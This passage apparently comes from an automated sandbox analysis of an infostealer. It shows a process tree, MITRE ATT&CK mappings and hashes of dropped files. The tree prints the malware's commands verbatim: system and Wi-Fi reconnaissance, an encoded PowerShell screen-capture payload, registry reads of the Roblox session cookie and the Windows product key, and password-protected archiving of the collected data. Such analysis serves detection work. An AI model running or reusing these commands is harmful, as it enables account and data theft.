- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4644
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4156
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4744
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1172
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4732
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4212
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ufomwzb4\ufomwzb4.cmdline"
        5⤵
        
        PID:5016
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBFE5.tmp" "c:\Users\Admin\AppData\Local\Temp\ufomwzb4\CSCDD851B99175A43B88E67B2507DFFA8.TMP"
        6⤵
        
        PID:1828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:488
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2764
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2244
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:688
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1452
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3336
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3664
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49242\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\bNIPa.zip" *"
    3⤵
    PID:2040
  - - C:\Users\Admin\AppData\Local\Temp\_MEI49242\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI49242\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\bNIPa.zip" *
      4⤵
      Executes dropped EXE
      PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4744
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4660
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1180
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2216 -ip 2216
1⤵
PID:4416

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2920 -ip 2920
1⤵
PID:4436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4416 -ip 4416
1⤵
PID:1544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1189a72e42e2321edf1ed3a8d5568687

SHA1
a2142fc754d6830de107d9d46f398483156f16a6

SHA256
009aee0a5f2d25ed79160e75cde58722def11663334ed20283e3afca32f971ea

SHA512
b1eb9b7aa7a57d0acec93b8152229b1f274a8d1b8f19133513486587f39b0636a9df89ddc6c2013e001d831f2b23cd0bb0fc084131824ea8e1dff134cd6d4f29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c8d315e2d960e6376f18a86f3c138595

SHA1
314f74815cc0fc0d4ea21bbd7f95aa7f8e1c7622

SHA256
17c1aed4484101ace66bb74d865fa5a4a75dc4ff491e3aebf58e9862ae263512

SHA512
9438147bc0de4699c4d4d8d0a8e635f611fa08e11fdca51dc9ea52e235273b7330c2058fb9e9f86363645112fdc478b201f26fad2a0334fe143586a028778733

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
57083a8e45ebe4fd84c7c0f137ec3e21

SHA1
857b5ea57f7bcf03cadee122106c6e58792a9b84

SHA256
f20102c4dc409cad3cdaf7a330c3a18a730a9d7d902b9fbee2a84186cba93d40

SHA512
4bbc21c07c05ee1f783242f0fb59324d5ff9ae18bdf892f02980d582fed83380888eeba58e1a6a321507cfd5d4fe82a328a0d3482b29633be4e3ebbeac636f87

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBFE5.tmp

Filesize
1KB

MD5
bfa1a3b8935d12f5b334aa84e3ed77ac

SHA1
75c5c7852d54bf22a38e3c9d08849c0980922b31

SHA256
2c5aa992e2c14dc2eb65068ea7e8e66e9ba6e4853d10c2d8d4f9d2a162b9f655

SHA512
621ec1d6afcc9cfe79b7afb0bb3fbbf47e89170eeb5b746072080a234f0e8f8fda9652c33b3cc14ffbaf4608c625887e8eac6741677b810df198e1aa974f00b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\_bz2.pyd

Filesize
48KB

MD5
554b7b0d0daca993e22b7d31ed498bc2

SHA1
ea7f1823e782d08a99b437c665d86fa734fe3fe4

SHA256
1db14a217c5279c106b9d55f440ccf19f35ef3a580188353b734e3e39099b13f

SHA512
4b36097eddd2c1d69ac98c7e98eebe7bb11a5117249ad36a99883732f643e21ecf58e6bea33b70974d600563dc0b0a30bead98bafb72537f8374b3d67979e60a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\_ctypes.pyd

Filesize
58KB

MD5
d603c8bfe4cfc71fe5134d64be2e929b

SHA1
ff27ea58f4f5b11b7eaa1c8884eac658e2e9248b

SHA256
5ee40bcaab13fa9cf064ecae6fc0da6d236120c06fa41602893f1010efaa52fe

SHA512
fcc0dbfbe402300ae47e1cb2469d1f733a910d573328fe7990d69625e933988ecc21ab22f432945a78995129885f4a9392e1cee224d14e940338046f61abe361

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\_decimal.pyd

Filesize
106KB

MD5
9cef71be6a40bc2387c383c217d158c7

SHA1
dd6bc79d69fc26e003d23b4e683e3fac21bc29cb

SHA256
677d9993bb887fef60f6657de6c239086ace7725c68853e7636e2ff4a8f0d009

SHA512
90e02054163d44d12c603debdc4213c5a862f609617d78dd29f7fd21a0bae82add4ceaf30024da681c2a65d08a8142c83eb81d8294f1284edfbeeb7d66c371c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\_hashlib.pyd

Filesize
35KB

MD5
32df18692606ce984614c7efda2eec27

SHA1
86084e39ab0aadf0ecfb82ce066b7bf14152961e

SHA256
b7c9c540d54ab59c16936e1639c6565cd35a8ca625f31753e57db9cbd0ee0065

SHA512
679f8956370edc4dee32475d8440a2d2f9b6dd0edd0e033e49fed7834a35c7ed51ccde0995d19ed0a559a4383b99ae8c11e4e686902db12a2a5e0a3f2c0f4a9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\_lzma.pyd

Filesize
85KB

MD5
01629284f906c40f480e80104158f31a

SHA1
6ab85c66956856710f32aed6cdae64a60aea5f0f

SHA256
a201ec286b0233644ae62c6e418588243a3f2a0c5a6f556e0d68b3c747020812

SHA512
107a4e857dd78dd92be32911e3a574f861f3425e01ab4b1a7580ac799dc76122ce3165465d24c34ac7fc8f2810547ad72b4d4ba3de76d3d61ed9bf5b92e7f7d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\_queue.pyd

Filesize
25KB

MD5
4a313dc23f9d0a1f328c74dd5cf3b9ab

SHA1
494f1f5ead41d41d324c82721ab7ca1d1b72c062

SHA256
2163010bfde88a6cc15380516d31955935e243b7ad43558a89380bf5fe86337e

SHA512
42c712b758b35c0005b3528af586233298c2df4ed9f5133b8469bca9ec421ab151ce63f3929898c73d616cd9707594fa5f96d623fc150e214a4b2276c23c296e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\_socket.pyd

Filesize
43KB

MD5
67897f8c3262aecb8c9f15292dd1e1f0

SHA1
74f1ef77dd3265846a504f98f2e2f080eadbf58a

SHA256
ddbfa852e32e20d67a0c3d718ce68e9403c858d5cad44ea6404aff302556aba7

SHA512
200b6570db2fbb2eac7f51cae8e16ffb89cd46d13fba94a7729a675f10f4432fc89a256fd6bd804feac528191bd116407fd58a0573487d905fc8fca022c1abba

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\_sqlite3.pyd

Filesize
56KB

MD5
230025cf18b0c20c5f4abba63d733ca8

SHA1
336248fde1973410a0746599e14485d068771e30

SHA256
30a3bc9ed8f36e3065b583d56503b81297f32b4744bff72dcf918407978ce332

SHA512
2c4d943c6587d28763cf7c21ad37cc4762674a75c643994b3e8e7c7b20576d5674cf700fdfaddc1a834d9bf034bf2f449d95351c236fde720505ccdd03369bb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\_ssl.pyd

Filesize
62KB

MD5
0d15b2fdfa03be76917723686e77823c

SHA1
efd799a4a5e4f9d15226584dd2ee03956f37bdaf

SHA256
2fc63abe576c0d5fe031cf7ee0e2f11d9c510c6dbacfc5dd2e79e23da3650ee8

SHA512
e21ab5ebe8b97243cf32ca9181c311978e203852847e4beb5e6ada487038c37dec18a2b683e11e420e05ace014aca2172b2dda15930bab944053843e25623227

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49242\base_library.zip

Filesize
1.4MB

MD5
5011d68fbea0156fe813d00c1f7d9af2

